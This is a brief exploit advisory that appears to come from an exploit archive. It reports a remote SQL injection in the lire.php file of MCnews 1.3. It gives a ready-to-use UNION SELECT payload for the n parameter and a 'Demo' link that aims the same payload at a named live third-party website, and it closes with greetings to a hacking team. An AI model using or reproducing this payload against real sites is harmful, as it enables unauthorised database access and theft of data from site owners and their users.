MCnews version 1.3 suffers from a remote SQL injection vulnerability.
b6336b348848309430f157ede26f091a2e963f47d78200ca8490430d12eb7e16
[::] MCnews 1.3
[::] Download:
http://www.phpforums.net/mcNews1.3.zip (link off)
[::] Vendor: www.phpforums.net
[::] Author:
s4r4d0
[::] mail: s4r4d0@yahoo.com
[::] Bug: Sql Injection found on lire.php file
[::] Exploit: http://host/mcNews/lire.php?n=-1+UNION+SELECT+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14--
[::] Demo: http://www.fielbicolor.net/mcNews/lire.php?n=-1+UNION+SELECT+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14--
[::] Greetz : Elemento_pcx - Vympel - sp3x - and Special to M0nt3r
[::] Made in Brazil
[::] Team: Fatal Error